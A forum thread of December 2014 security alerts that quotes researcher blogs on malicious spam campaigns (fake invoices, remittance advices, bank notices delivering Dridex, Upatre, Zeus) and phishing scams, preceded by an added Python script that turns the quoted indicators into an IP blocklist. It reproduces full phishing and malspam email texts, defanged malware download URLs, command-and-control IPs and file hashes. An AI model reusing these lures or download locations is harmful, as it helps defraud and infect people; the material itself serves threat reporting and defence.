* http://www.hoax-slayer.com/images/email-address-tansmitting-viruses.jpg
:mad: :fear:
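The dynamoo posts in this thread each end with a "Recommended blocklist": whole ranges (46.161.30.0/24 on 4 Dec, 5.196.33.8/29 on 9 Dec), single hosts that recur from post to post (203.172.141.250 and 74.208.11.204 appear on both 5 and 8 Dec), and defanged hostnames such as hiro-wish .com. The Python below is an added example written for this page, not the poster's or dynamoo's code: it refangs the entries as they are written in the thread, collapses the IPs into a minimal set of networks, checks an observed destination against them, and renders the result as ipset/iptables commands (emitted as text, not executed; the set name spam-c2 is an arbitrary choice). The entry list is copied from the blocklists quoted above this point in the thread.

```python
import ipaddress

# Entries as quoted from the "Recommended blocklist" sections above (dynamoo, Dec 2014).
RAW_BLOCKLIST = [
    "46.161.30.0/24",                                                     # 4 Dec, KolosokIvan-net
    "194.146.136.1", "84.92.26.50", "79.137.227.123", "124.217.199.218",  # 5 Dec, remittance advice
    "203.172.141.250", "46.4.232.200", "74.208.11.204", "hiro-wish .com", # 5 Dec, order/invoice
    "203.172.141.250", "74.208.11.204", "aircraftpolish .com", "gofoto .dk",  # 8 Dec, repeats
    "5.196.33.8/29",                                                      # 9 Dec, OVH UK block
]


def refang(entry):
    """Undo the thread's defanging ('hxxp ://', 'example .com') and keep host or CIDR."""
    e = entry.strip().lower()
    for scheme in ("hxxps", "hxxp", "https", "http"):
        for sep in ("://", " ://"):
            if e.startswith(scheme + sep):
                e = e[len(scheme + sep):]
    e = e.replace(" .", ".").replace(". ", ".")
    host, _, rest = e.partition("/")
    if rest.isdigit():                  # "a.b.c.d/24": keep the prefix length
        return host + "/" + rest
    return host.partition(":")[0]       # drop ":8080/stat/lld.php" style URL tails


def build_blocklist(entries):
    """Return (collapsed IPv4 networks, sorted hostnames) from mixed raw entries."""
    nets, domains = [], set()
    for raw in entries:
        e = refang(raw)
        try:
            nets.append(ipaddress.ip_network(e, strict=False))
        except ValueError:
            domains.add(e)
    # collapse_addresses removes duplicates and merges ranges that abut or overlap
    return list(ipaddress.collapse_addresses(nets)), sorted(domains)


def is_blocked(ip, nets):
    """True if an observed destination falls inside any blocked network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in nets)


def ipset_commands(nets, setname="spam-c2"):
    """Render the networks as ipset/iptables commands (text only; nothing is executed)."""
    lines = ["ipset create %s hash:net -exist" % setname]
    lines += ["ipset add %s %s -exist" % (setname, n.with_prefixlen) for n in nets]
    lines.append("iptables -I OUTPUT -m set --match-set %s dst -j REJECT" % setname)
    return lines


if __name__ == "__main__":
    nets, domains = build_blocklist(RAW_BLOCKLIST)
    print("\n".join(ipset_commands(nets)))
    print("# hostnames for DNS sinkhole / proxy deny list:", ", ".join(domains))
    for probe in ("46.161.30.77", "5.196.33.12", "5.196.33.16"):
        print(probe, "blocked" if is_blocked(probe, nets) else "allowed")
```

A /29 covers eight addresses (5.196.33.8 through 5.196.33.15), which is why the dynamoo post can name .8, .9, .10 and .15 individually and still recommend the whole block; the membership check above reflects that boundary exactly.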
AplusWebMaster
2014-12-10, 13:52
FYI...
Fake 'Remittance Advice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/spam-remittance-advice-from-anglia.html
10 Dec 2014 - "This spam email does not come from Anglia Engineering Solutions Ltd but instead comes from a criminally-operated botnet and has a malicious attachment.
From: Serena Dotson
Date: 10 December 2014 at 10:33
Subject: Remittance Advice from Anglia Engineering Solutions Ltd [ID 334563N]
Dear ,
We are making a payment to you.
Please find attached a copy of our remittance advice, which will reach your bank account on 11/12/2014.
If you have any questions regarding the remittance please contact us using the details below.
Kind regards
Serena Dotson
Anglia Engineering Solutions Ltd ...
The sender's name, ID number and attachment name vary from spam email to spam email. It comes with one of two Excel attachments, both of which are malicious but undetected by any AV product [1] [2], each containing one of two malicious macros... which attempt to download an executable from the following locations:
http ://217.174.240.46:8080/stat/lld.php
http ://187.33.2.211:8080/stat/lld.php
This file is downloaded as test.exe and is then copied to %TEMP%\LNUDTUFLKOJ.exe. This executable has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows attempted connections to the following IPs:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
84.92.26.50 (PlusNet, UK)
87.106.246.201 (1&1, Germany)
Traffic to 194.146.136.1 is also confirmed by VirusTotal. The Malwr report shows the same traffic. The payload is most likely Dridex, a banking trojan. I recommend that you block traffic to the following IPs:
194.146.136.1
84.92.26.50
87.106.246.201
217.174.240.46
187.33.2.211 "
1] https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418208470/
2] https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418208468/
* https://www.virustotal.com/en/file/c92200fd311abe6f1e8422781f3eefec7ef2791ab0f43e4552bd27488091da94/analysis/1418208856/
- http://myonlinesecurity.co.uk/remittance-advice-anglia-engineering-solutions-ltd-excel-xls-malware/
10 Dec 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Anglia-Engineering-Solutions.jpg
* https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418209362/
** https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418209779/
___
Fake JPMorgan Chase – ACH – Bank account info SPAM – PDF malware
- http://myonlinesecurity.co.uk/gre-project-accounting-jpmorgan-chase-ach-bank-account-information-form-fake-pdf-malware/
10 Dec 2014 - "'ACH – Bank account information form' pretending to come from random names at jpmchase.com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please fill out and return the attached ACH form along with a copy of a voided check.
Jules Hebert,
JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor
Fax-602-221-2251
Jules.Hebert@ jpmchase .com
GRE Project Accounting
10 December 2014: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr
Current Virus total detections: 5/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37ca2089e469332ff3400712726cdb85f4e07ef84d245e9d68b9ed1276dac0d7/analysis/1418238116/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
213.175.194.96: https://www.virustotal.com/en/ip-address/213.175.194.96/information/
UDP communications
107.23.150.92: https://www.virustotal.com/en/ip-address/107.23.150.92/information/
___
Fake 'PRODUCT ENQUIRY' SPAM - jpg malware
- http://myonlinesecurity.co.uk/re-product-enquiry-fake-jpg-malware/
10 Dec 2014 - "'RE: PRODUCT ENQUIRY' coming from a random company with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
We are very interested in your product line. We got your profile from sister-companies. Can you please email me the list of all your Class A products and their prices? How much is the minimum order for shipping? What is the mode of payment and can you ship to Stockholm (SWEDEN)?
Please refer to the attached photo in my email. I was informed that this was purchased from your company. I would also like to order this product. Can you send the product code in your reply.
Thank you very much
Stven Clark
Lindhagensgatan 90,
112 18 Stockholm,
SWEDEN…
10 December 2014: Product Image NO. 1_jpeg…………….. (1).7z:
Extracts to: Product Image NO. GXD46474848494DHW_jpeg…………….. (1).exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have "show known file extensions" enabled, will look like a proper jpg file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d723f44d1d2943966f9ad4e5529af1816bfb51f261e68304241255a68f8c15d7/analysis/1418220978/
___
85% of website scams - China
- http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
10 Dec 2014 - "Chinese internet users are behind 85 per cent of -fake- websites, according to a semi-annual report [PDF*] from the Anti-Phishing Working Group (APWG). Of the 22,679 -malicious- domain registrations that the group reviewed, over 19,000 were registered to servers based in China. This is in addition to nearly 60,000 websites that were hacked in the first half of 2014 and then used to acquire people's details and credit card information while pretending to offer real goods or services. Chinese registrars were also the worst offenders, with nine of the top ten companies with the highest percentages of phished domains based in China. Dot-com domains are the most popular for phishing sites, being used in 51 per cent of cases, but when it comes down to the percentage of phished domains against the number of domains under that registry, the clear winner is the Central African Republic's dot-cf, with more than 1,200 phished domains out of a total of 40,000 (followed by Mali's dot-ml, Palau's dot-pw and Gabon's dot-ga). Despite concerted efforts to crack down on fake websites, little improvement was made on the last report in terms of uptime (although it is significantly lower than when the group first started its work back in 2010). The average uptime of a phishing site was 32 hours, whereas the median was just under 9 hours. As for the phishers' targets: Apple headed the list for the first time, being used in 18 per cent of all attacks, beating out perennial favorite PayPal with just 14 per cent. Despite some fears, the introduction of hundreds of new generic top-level domains has not led to a noticeable increase in phishing, according to the report. The authors posit that this may be because of the higher average price of new gTLDs, although they expect the number of new gTLD phished domains to increase as adoption grows and websites are compromised. Around 20 per cent of phishing attacks are achieved through hacking of vulnerable shared hosting providers..."
* http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___
Zeus malware thru browser warning: social engineering...
- http://blog.phishlabs.com/zeus-malware-distributed-through-browser-warning-social-engineering-at-its-finest
Dec 5, '14 - "Zeus malware continues to plague the Internet with distributions through spam emails and embeds in compromised corners of the web – all designed to exploit unsuspecting consumers. PhishLabs’ R.A.I.D. (Research Analysis and Intelligence Division) recently observed the Zeus malware being distributed through an alarmingly convincing browser warning that prompts viewers to download and “restore settings”... designed to manipulate viewers so that they believe the alert is based on security preferences that he or she has previously set up. The message creates a sense of urgency and fear, warning of “unusual activity”... Generally speaking, grammar and spelling are often indicators of fake or malicious requests that lead to malware but cybercriminals have caught on to this vulnerability and stepped up their game. Although it is not perfect, the warning observed in this case was much more accurate than what we usually see. The warning states:
"REPORTED BROWSER ONLINE DOCUMENT FILE READER WARNING”. We have detected unusual activities on your browser and the Current Online Document File Reader has been blocked base on your security preferences. It is recommended that you update to the latest version available in order to restore your settings and view Documents."
Browser warning leading to Zeus malware download:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2183047529-png/blog-files/Zeus_Browser_Warning.png
The fake browser warning requires the user to click the "Download and Install" button. Once clicked, the victim is redirected to a site that downloads the Zeus executable (Zbot) malware. The R.A.I.D was able to track the malware back to the Zeus control panel...
Zeus (Zbot) malware control panel:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2184127607-png/blog-files/Zeus_Control_Panel..png
Web users should be on the lookout for this kind of social engineering that capitalizes on fear and misleads users to believe the alert is showing up based on user-defined preferences. Zeus is a dangerous malware that continues to be distributed through sophisticated avenues. In the past, Zeus infections have led to exploitation of machines, making them part of a -botnet-, as well as bank account takeovers and fraud."
:fear::fear: :mad:
AplusWebMaster
2014-12-11, 13:19
FYI...
Fake Invoice 'UK Fuels E-bill' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/uk-fuels-e-bill-ebillinvoicecom-spam.html
11 Dec 2014 - "This -fake- invoice comes with a malicious attachment:
From: invoices@ ebillinvoice .com
Date: 11 December 2014 at 08:06
Subject: UK Fuels E-bill
Customer No : 35056
Email address : [redacted]
Attached file name : 35056_49_2014.doc
Dear Customer
Please find attached your invoice for Week 49 2014.
In order to open the attached DOC file you will need
the software Microsoft Office Word.
If you have any queries regarding your e-bill you can contact us at invoices@ ebillinvoice .com.
Yours sincerely
Customer Services
UK Fuels Ltd ...
This spam is not from UK Fuels Ltd or ebillinvoice .com and is a forgery. Attached is a malicious Word document which in the sample I have seen is undetected by AV vendors*. This downloads a file from the following location:
http ://KAFILATRAVEL .COM/js/bin.exe
This is downloaded and saved to %TEMP%\LNKCLHSARFL.exe. This binary only has a detection rate of 3/56** at VirusTotal. The Malwr report shows that it POSTs data to 203.172.141.250 (Ministry of Education, Thailand), which has been commonly used in this sort of attack (I strongly recommend that you -block- this IP). It also drops a DLL which is probably Dridex, which has a detection rate of only 1/55***."
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418293134/
** https://www.virustotal.com/en/file/9fae183a06c6980b8f6662156612e395e70cf75aa1c266037fcbbd283e9923ad/analysis/1418293637/
*** https://www.virustotal.com/en/file/a35597d4ae580653b5c26f0e739215e63ab39e74a76903357ed1616d096e1962/analysis/1418294506/
- http://myonlinesecurity.co.uk/uk-fuels-e-bill-word-doc-malware/
11 December 2014 : 35056_49_2014.doc (89kb) Current Virus total detections: 0/56*
35056_49_2014.doc (69kb) Current Virus total detections: 0/56**
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418285959/
** https://www.virustotal.com/en/file/1e367459dd260c055f3b51cf22d7d8125cfc14b3d3178d6b3cf60850091f4dc7/analysis/1418285875/
___
Fake 'RBS Important Docs' SPAM – doc malware
- http://myonlinesecurity.co.uk/rbs-important-docs-word-doc-malware/
11 Dec 2014 - "'RBS Important Docs' pretending to come from Lenore Hinkle <Lenore@ rbs .co .uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review attached documents regarding your account.
Tel: 01322 182123
Fax: 01322 011929
email: Lenore@ rbs .co.uk
This information is classified as Confidential unless otherwise stated.
11 December 2014: RBS_Account_Documents.doc (1mb) Current Virus total detections: 1/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e1552f04ca253e3910d0b3fa0e96bca3ce43561c2cb53162bad1436b4d5f0de5/analysis/1418306209/
___
REVETON Ransomware spreads ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/reveton-ransomware-spreads-with-old-tactics-new-infection-method/
Dec 11, 2014 - "... Over the past few months spanning October up to the last weeks of November, we observed a noticeable increase in REVETON malware variants, in particular, TROJ_REVETON.SM4 and TROJ_REVETON.SM6... Below is the warning message along with a MoneyPak form to transfer the payment of $300 USD. The message also warns users that they have only 48 hours to pay the fine.
Fake warning messages from Homeland Security and the ICE Cyber Crime Center:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/homeland_ice.png
... the healthcare industry seems to be the most affected industry by this malware and mostly centered in the United States, followed by Australia. Below is a ranking of most affected countries by this new wave of REVETON malware spanning October to November 2014.
Data for TROJ_REVETON.SM4 and TROJ_REVETON.SM6 for October – November 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/reveton-new-infect2.jpg
... It might be jarring for users to suddenly receive a message supposedly sent by law enforcement agencies. However, they need to keep in mind that this is just a tactic intended to “scare” users into paying the fee. Users might also be tempted to pay the ransom to get their computers up and running once again. Unfortunately, there is no guarantee that paying the ransom will result in having the computer screen unlocked. Paying the ransom will only guarantee more money going into the pockets of cybercrooks... Some ransomware variants arrive as attachments of spammed messages. As such, users should be wary of opening emails and attachments, especially those that come from unverified sources. If the email appears to come from a legitimate source (read: banks and other institutions), users should verify the email with the bank. If from a personal contact, -confirm- if they sent the message. Do not rely solely on trust by virtue of relationship, as friends or family members may be victims of spammers as well."
___
Phish: CloudFlare SSL certificate abused
- https://blog.malwarebytes.org/fraud-scam/2014/12/free-ssl-certificate-from-cloudflare-abused-in-phishing-scam/
Dec 11, 2014 - "... received a phishing email pretending to come from LogMeIn, the popular remote administration tool. It uses a classic scare tactic “We were unable to charge your credit card for the due amount.( Merchant message – Insufficient funds )” to trick the user into opening up a -fake- invoice:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/unphish.png
... What struck our interest here was the fact that this link was https based. It was indeed a secure connection... with a valid certificate:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/certificatechain.png
On September 29, CloudFlare, a CDN and DNS provider amongst other things, announced Universal SSL, a feature available to all its paid and free customers. It is not the first time cyber-criminals are abusing CloudFlare, and this case is not entirely surprising. By giving a false sense of security (the HTTPS padlock), users are more inclined to follow through and download the malicious file.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/properties.png
... CloudFlare is issuing a warning that the URL is a ‘Suspected phishing site':
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/warning.png
In some regard SSL certifications may become like digitally signed files, where while they do add a level of trust one should still exercise caution and not blindly assume everything is fine. It might be difficult to keep up with each and every new site that wants to abuse the system (cat-and-mouse game)... We can certainly expect cyber criminals to start using SSL more and more given that it is freely available and not extremely difficult to put in place. Another standard known as Extended Validation Certificate SSL (EV SSL) requires additional validation than plain SSL, but again, this does not make things simple for the end user. If regular SSL is deemed weak, then we have a bit of a problem... We have reported this URL to CloudFlare and hope they can revoke the SSL certificate and shutdown the site."
:fear: :mad:
AplusWebMaster
2014-12-12, 19:32
FYI...
Info-Stealing file infector hits US, UK
- http://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/
Dec 11, 2014 5:15 pm (UTC-7) - "... there has been a spike in infections related to the malware URSNIF. The URSNIF family is known to steal information such as passwords. Spyware is always considered high risk, but these URSNIF variants can cause damage beyond info-stealing. These URSNIF variants are file-infectors — which is the cause of the noted spike... the countries most affected by the spike are the United States and the United Kingdom. These two countries comprise nearly 75% of all the infections related to these URSNIF variants. Canada and Turkey are the next countries most affected by the malware.
Countries affected by URSNIF spike, based on data gathered for December 2014 so far:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike.jpg
Additional feedback shows that education, financial, and manufacturing were among the industries affected by this spike... It infects all .PDF, .EXE, and .MSI files found in all removable drives and network drives. URSNIF packs the found files and embeds them in its resource section. When these infected files are executed, it will drop the original file in %User Temp% (~{random}.tmp.pdf, ~{random}.tmp.exe) and then execute it to trick the user into thinking the opened file is still fine... After deleting the original .PDF file, it will create an .EXE file using the file name of the original .PDF file. As for .MSI and .EXE files, it will insert its code into the current executable. It will only infect .EXE files with “setup” in their filename.
Difference between an infected (top) and clean (bottom) .PDF file. The infected file is 3.18 MB while the clean file is 2.89 MB:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike3.png
For MSI files, it will execute the original file first before executing the malware code. For .PDF and .EXE files, it will produce a dropper-like Trojan, which will drop and execute the original file and the main file infector... The malware family URSNIF is better known as spyware. Variants can monitor network traffic by hooking network APIs related to top browsers such as Internet Explorer, Google Chrome, and Mozilla Firefox. It is also known for gathering information. However, the fact that a family known for spyware now includes file infectors shows that cybercriminals are not above tweaking established malware to expand its routines... A different file infector type (e.g., appending) requires a different detection for security solutions; not all solutions may have this detection. Another notable feature for this particular malware is that it starts its infection routine 30 minutes after its execution... variants often arrive via spammed messages and Trojan dropper/downloader malware. Users need a comprehensive security solution that goes beyond detecting and blocking malware. Features like email reputation services which can detect and block spam and other email-related threats can greatly boost a computer’s security... infected .PDF and .EXE files are detected as PE_URSNIF.A2. Infected .MSI files are detected as PE_URSNIF.A1.
Hashes of the related files:
dd7d3b9ea965af9be6995e823ed863be5f3660e5
44B7A1555D6EF109555CCE88F2A954CAFE56B0B4
EFC5C6DCDFC189742A08B25D8842074C16D44951
FD3EB9A01B209572F903981675F9CF9402181CA1 "
___
Fake 'Order' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/wavecablecom-order-r58551-spam.html
12 Dec 2014 - "This -fake- invoice comes with a malicious attachment.
From: kaybd2@ wavecable .com
Date: 12 December 2014 at 17:17
Subject: Order - R58551
Thanks for placing order with us today! Your order is now on process.
Outright Purchase: 6949 US Dollars
Please click the word file provided below to see more details about your order.
BILLING DETAILS
Order Number: ZJW139855932
Purchase Date: 13.07 11.12.2014
Customer Email: info@ [redacted]
Attached is a malicious Word document INVOICE_7794.DOC which has a detection rate of 4/56* on VirusTotal... macro downloads an executable from:
http ://www.2fs. com .au/tmp/rkn.exe
That has a VirusTotal detection rate of 5/55**... A malicious DLL is dropped onto the system with a VirusTotal detection rate of 2/56***. The only detections are generic, but similar dropped DLLs have been the Dridex banking trojan.
Recommended blocklist:
209.208.62.36
5.187.1.78
46.250.6.1
5.135.28.106
66.213.111.72
95.211.188.129 "
* https://www.virustotal.com/en/file/902aa90dd61f1a89a547726ff06555285463c826d1af673ebdcc148c2200b229/analysis/1418406000/
** https://www.virustotal.com/en/file/90fca160a837f62fdcff2fc3d0a849498a3485c39c7c42a12dc959f5e5db0e56/analysis/1418406121/
*** https://www.virustotal.com/en/file/b13eb856439baf196084f6fc47825d9c677199f71724f351cdd193e30e2618c4/analysis/1418408045/
___
Spammers Accelerate Dyre Distribution
- http://www.threattracksecurity.com/it-blog/dyre-spam/
Dec 12, 2014 - "... Over the last few weeks, the cybercriminals behind Dyre have continued to refine their delivery tactics, and the Trojan is now capable of helping to spread itself and other malware. Our researchers have observed that systems infected with Dyre are not only at risk of the malware stealing log-in credentials, but may also receive commands to download and install additional spammers – including the Cutwail/Pushdo botnet – to more broadly propagate Dyre. Pushdo is responsible for a large portion of Upatre spam, and the botnet is actively distributing Dyre and other malware, including the data-encrypting ransomware CryptoWall... The bad guys are pulling out all the stops when it comes to distributing their malicious spam. Everything from fraudulent PayPal security alerts to a Top Gun-inspired tale about a Norwegian fighter pilot crossing paths with a Russian MiG to a fake survey purporting to ask recipients their opinions on the controversial events in Ferguson, Missouri, have all been employed to trick recipients into clicking links and opening infected attachments. We recently observed Dyre downloading three spammers. The first is Pushdo, which runs its own spammer modules. The second and third are standalone spammers, one of which hijacks the victim’s Microsoft Outlook application to send personal emails with attachments harboring Upatre. The third spammer (see images and email text below from a small sampling) is generating a separate campaign that has been increasing in frequency over the last several weeks. All this signals that Dyre is poised to become a more pervasive threat and increasingly active in malicious spam campaigns.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/12/CNN-Norwegian-Russian-MiG-Spam.png
(Multiple other SPAM samples shown at the threattracksecurity URL at the top of this post.)
...Ensure your antivirus and endpoint security is up-to-date, and deploy a robust email security solution to protect your organization from malicious spam. IT admins should continue to educate their users about email-borne threats and stress that despite them being at work, they shouldn’t click links and open attachments without regard for security... Consumers should -always- be cautious about what they click, and if there is any doubt about a warning, special offer or request for private information, contact the bank, retailer or service provider directly by -phone- to confirm."
___
Wire transfer spam spreads Upatre
- http://blogs.technet.com/b/mmpc/archive/2014/12/11/wire-transfer-spam-spreads-upatre.aspx
11 Dec 2014 - "... currently monitoring a spam email campaign that is using a wire transfer claim to spread Trojan:Win32/Upatre. It is important to note that customers running up-to-date Microsoft security software are protected from this threat..."
:fear::fear: :mad:
AplusWebMaster
2014-12-15, 17:17
FYI...
Fake 'Payment Advice' SPAM - malicious doc attached
- http://blog.dynamoo.com/2014/12/malware-spam-ifs-applications.html
15 Dec 2014 - "This -fake- payment advice spam is not from Vitacress but is a -forgery- with a malicious Word document attached.
From: IFS Applications [Do_Not_Reply@ vitacress .co.uk]
Date: 15 December 2014 at 07:49
Subject: DOC-file for report is ready
The DOC-file for report Payment Advice is ready and is attached in this mail.
Attached is a file Payment Advice_593016.doc which is actually one of two different documents with zero detections at VirusTotal [1] [2] and contains one of two malicious macros... that download a malware binary from one of the following locations:
http ://gv-roth .de/js/bin.exe
http ://notaxcig .com/js/bin.exe
This file is saved as %TEMP%\DYIATHUQLCW.exe and currently has a VirusTotal detection rate of just 1/52*. The ThreatExpert report and Malwr report show attempted connections to the following IPs which have been used in many recent attacks and should be -blocked- if you can:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1, US)
The malware almost definitely drops the Dridex trojan onto the target system, but I have not been able to get a sample of this yet."
1] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418633977/
2] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418633990/
* https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/1418634587/
>> http://myonlinesecurity.co.uk/ifs-applications-doc-file-report-ready-word-doc-malware/
15 Dec 2014
1] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418628093/
2] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418628835/
- http://blog.mxlab.eu/2014/12/15/email-doc-file-for-report-is-ready-contains-malicious-word-macro-file-that-downloads-trojan/
Dec 15, 2014
> https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/
... Behavioural information
TCP connections
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___
GoDaddy 'Account Notice' - Phish ...
- http://www.hoax-slayer.com/godaddy-account-error-phishing-scam.shtml
Dec 15, 2014 - "Email purporting to be from web hosting company GoDaddy claims that your account may pose a potential performance risk to the server because it contains 'too many directories'... The email is -not- from GoDaddy. It is a phishing scam designed to steal your GoDaddy login details. A link in the message takes you to a -fake- Go Daddy login page...
Example:
Subject: Account Notice : Error # 7962
Dear Valued GoDaddy Customer: Brett Christensen
Your account contains more than 3331 directories and may pose a potential performance risk to the server.
Please reduce the number of directories for your account to prevent possible account deactivation.
In order to prevent your account from being locked out we recommend that you create special TMP directory.
Or use the link below :
[Link Removed]
Sincerely,
GoDaddy Customer Support...
... criminals responsible for this phishing attack can use the stolen login details to hijack the victims' GoDaddy account. Once they have gained access to the account, the criminals can take control of the victim's website and email addresses and use them to perpetrate spam, scam, and malware attacks. Always login to your online accounts by entering the web address into your browser's address bar rather than by clicking-a-link in an email."
:fear: :mad:
AplusWebMaster
2014-12-16, 17:09
FYI...
Fake 'eFax Drive' SPAM - malicious ZIP
- http://blog.mxlab.eu/2014/12/16/url-in-fake-email-from-efax-drive-youve-received-a-new-fax-leads-to-malicious-zip-archive/
Dec 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “You’ve received a new fax”. This email is sent from the -spoofed- address and has the following body:
New fax at SCAN9106970 from EPSON by https ://******* .com
Scan date: Tue, 16 Dec 2014 13:17:59 +0000
Number of pages: 2
Resolution: 400×400 DPI
You can secure download your fax message at:
hxxp: //nm2b .org/bhnjhkkgvq/ufqielyyva.html
(eFax Drive is a file hosting service operated by J2, Inc.)
The downloaded file document7241_pdf.zip contains the 33 kB file document7241_pdf.scr. The trojan is known as Packed.Win32.Katusha.1!O or Malware.QVM20.Gen. At the time of writing, 2 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d8b1d64ae49b437df163061af11c8f0f0e5dad338c37cfedd4e6f30e37f6499c/analysis/
nm2b .org: 173.254.28.126: https://www.virustotal.com/en/ip-address/173.254.28.126/information/
___
Fake 'Bank account frozen' SPAM - doc malware
- http://myonlinesecurity.co.uk/bank-account-frozen-notice-note-attention-fake-word-doc-malware/
16 Dec 2014 - "'Bank account frozen notice, note, attention. Attention #CITI-44175PI-77527' with a cab attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.
Notification Number: 8489465
Mandate Number: 6782144
Date: December 16, 2014. 01:13pm
In an effort to protect your Banking account, we have frozen your account until such time that it can be safely restored by you. Please view attached file “CITI-44175PI-77527.cab” for details.
Yours truly,
Kathy Schuler ...
16 December 2014: CITI-44175PI-77527.cab : Extracts to: CITI-44175PI-77527.scr
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have "show known file extensions" enabled, will look like a proper word.doc file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0699621c07f92b81d0b7eef250ae15830c10034b8f1b04a07e0fb43cbcfea54/analysis/1418745402/
___
Wells Fargo Secure Meessage Spam
- http://threattrack.tumblr.com/post/105365947973/wells-fargo-secure-meessage-spam
Dec 16, 2014 - "Subjects Seen:
You have a new Secure Message
Typical e-mail details:
You have received a secure message
Read your secure message by download document-75039.pdf. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting:
nexpider .com/sawdnilhvi/ckyilmmoca.html
Malicious URLs:
nexpider .com/sawdnilhvi/ckyilmmoca.html
Malicious File Name and MD5:
document82714.scr (98FE8CAD93B6FCDE63421676534BCC57)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8dec4c587c25e211bdabdb5bb92d35e4/tumblr_inline_ngostrpvc41r6pupn.png
Tagged: Upatre, Wells Fargo
___
Trawling for Phish
- https://blog.malwarebytes.org/online-security/2014/12/trawling-for-phish/
Dec 16, 2014 - "... avoid on your travels, whether you’re sent a link to them directly or see the URLs linked in an email. First up, a page located at:
secure-dropboxfile (dot)hotvideostube(dot)net/secure-files-dropbox/document/
It claims to offer a shared Dropbox document in return for entering your email credentials. It follows the well-worn pattern of offering multiple login options for different types of email account, including Gmail, AOL, Windows Live, Yahoo and “other”:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn1.jpg
